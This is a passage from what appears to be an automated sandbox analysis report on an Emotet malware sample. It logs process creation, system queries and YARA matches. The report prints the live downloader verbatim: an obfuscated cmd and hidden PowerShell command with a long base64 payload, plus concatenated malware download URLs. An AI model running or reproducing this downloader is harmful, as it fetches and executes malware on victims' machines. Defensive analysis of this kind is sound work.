')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+' Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',VDZITWzoE Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',KCoulWayDpJU Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',iFoslrVsudBDI Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',#1 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000009.00000002.2125204739.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2340896532.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2169811211.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2182561871.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2135567121.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2339373586.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2192714957.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2149727008.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2192700429.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2182761575.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2165744116.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2128583729.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2125222649.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2151547723.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2102076691.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2135550534.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2114421803.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2160551478.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2102719700.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2117996445.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2114399878.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2149672448.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2169787783.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2137671003.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2193587143.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2170530219.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2184882219.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2102091974.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2339389951.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2160390338.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
